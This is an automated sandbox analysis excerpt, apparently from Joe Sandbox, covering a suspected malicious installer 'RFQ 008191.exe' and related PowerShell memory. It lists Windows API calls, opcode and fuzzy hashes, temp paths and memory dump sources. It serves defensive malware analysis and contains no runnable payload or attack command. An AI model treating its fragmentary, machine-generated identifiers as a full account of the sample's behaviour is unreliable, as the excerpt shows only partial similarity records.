                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                    • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
APIs
• lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
• wsprintfW.USER32 ref: 00404E17
• SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
• Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
• Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
• Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
APIs
• lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
• CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403509,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
• lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E10
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user~1\AppData\Local\Temp\
• API String ID: 2659869361-2382934351
• Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
• Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
• Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
• Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
APIs
• DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
• GetTickCount.KERNEL32 ref: 0040306F
• CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
• ShowWindow.USER32(00000000,00000005), ref: 0040309A
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
• Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
• Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
• Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
APIs
  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
  • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405EC9
  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
• lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405F71
• GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F81
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F18
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user~1\AppData\Local\Temp\
• API String ID: 3248276644-2382934351
• Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
• Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
• Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
• Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
APIs
• IsWindowVisible.USER32(?), ref: 00405569
• CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
  • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
• Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
• Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
• Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
APIs
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
• RegCloseKey.ADVAPI32(?), ref: 00406460
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
• Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
• Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
• Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
• Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
APIs
• FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
• GlobalFree.KERNEL32(00000000), ref: 00403B9F
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B7E
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user~1\AppData\Local\Temp\
• API String ID: 1100898210-2382934351
• Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
• Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
• Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
• Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
Strings
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3976562730
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
• CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
• lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
• API String ID: 0-1721289453
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q$tPq$tPq
• API String ID: 0-3271992745
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q
• API String ID: 0-4210068417
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q
• API String ID: 0-4210068417
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q
• API String ID: 0-4210068417
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: $q$$q$$q
• API String ID: 0-3067366958
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: $q$$q$$q
• API String ID: 0-3067366958
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q
• API String ID: 0-1467158625
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q
• API String ID: 0-1467158625
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q
• API String ID: 0-1467158625
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: $q$$q
• API String ID: 0-3126353813
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q
• API String ID: 0-1807707664
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q
• API String ID: 0-1807707664
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q
• API String ID: 0-1807707664
Strings
Memory Dump Source
• Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q
• API String ID: 0-1807707664
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q
                                                                    • API String ID: 0-1807707664
                                                                    • Opcode ID: 7fa2ca01aacc21349d29e8da036f80422da101aee1acd18c5e552a7dfe4a503e
                                                                    • Instruction ID: 928e40fc357a3ad48de40475fda25cc0bdc1a088ea8ed8239b10f0e259697aea
                                                                    • Opcode Fuzzy Hash: 7fa2ca01aacc21349d29e8da036f80422da101aee1acd18c5e552a7dfe4a503e
                                                                    • Instruction Fuzzy Hash: 5D2127F1A00206EFEB789A7588507FB76E1AB85204F244066D906DB3D5DB35C852C7E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5896a0f8461930fb1d3858af3ce9027f5a742d0b90b512e58ca8f9e6e30ee52
                                                                    • Instruction ID: 75cb00a0444cb3c1202a37e0fb4f27011cbddc40fbbce1b36d2c66b01d7d11c3
                                                                    • Opcode Fuzzy Hash: a5896a0f8461930fb1d3858af3ce9027f5a742d0b90b512e58ca8f9e6e30ee52
                                                                    • Instruction Fuzzy Hash: F9F12AB4A01204AFEB19CF98D551B9ABBF2BF88305F15C059E9069B3A1C772FD41CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05cae48a878d4769b46e763b71bd6e6ae100e84078fb83653d26dc04919d5c91
                                                                    • Instruction ID: 5949efba432291351e02e7fb3edaa9919e14c67849d89f7ff06f352db1237c87
                                                                    • Opcode Fuzzy Hash: 05cae48a878d4769b46e763b71bd6e6ae100e84078fb83653d26dc04919d5c91
                                                                    • Instruction Fuzzy Hash: EBE151B4B012459FD728CB98C550B5ABBF2BF8A305F15C069DA06AB395CB71EC42CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 622ebe90e3f529f1e3c15ac5a2b2dcaba13505d8c4e449cce626066e5e7ca9ed
                                                                    • Instruction ID: 79d2c73b80bd15df145cc0f3f093ad60175c7f13d60e5f56dea1900d79d6b1e8
                                                                    • Opcode Fuzzy Hash: 622ebe90e3f529f1e3c15ac5a2b2dcaba13505d8c4e449cce626066e5e7ca9ed
                                                                    • Instruction Fuzzy Hash: DFE160B4A012459FD728CF58C550B9ABBF2FF8A314F15C059EA06AB395CB72EC41CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecc0f1a458b28ab455c3c72753408087f7870ea67ee8bc69d484ea388b30a27e
                                                                    • Instruction ID: 860ba9f21ee1ad496abaeaf84e59e5779e92aa3fcb4d6b3920d6865fafa5290a
                                                                    • Opcode Fuzzy Hash: ecc0f1a458b28ab455c3c72753408087f7870ea67ee8bc69d484ea388b30a27e
                                                                    • Instruction Fuzzy Hash: AEE14FB4A102199FEB24CB64CC55BEBB7B2BB85304F108199D50A6B792CB71DD81CFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e64db1c204e5877418fd3c31a614578629e2ba6957eddb927f11b92c9c47451d
                                                                    • Instruction ID: 0f6b8f4491fb25a148fdbbd3d2b8b10a7310e3567fa119b1966efd3b29e0928a
                                                                    • Opcode Fuzzy Hash: e64db1c204e5877418fd3c31a614578629e2ba6957eddb927f11b92c9c47451d
                                                                    • Instruction Fuzzy Hash: 68A19F39A002089FDB14DFA4D544A9DBBB6FFC8314F218558D806AF365DB74BD89CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1762437700.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_4ab0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
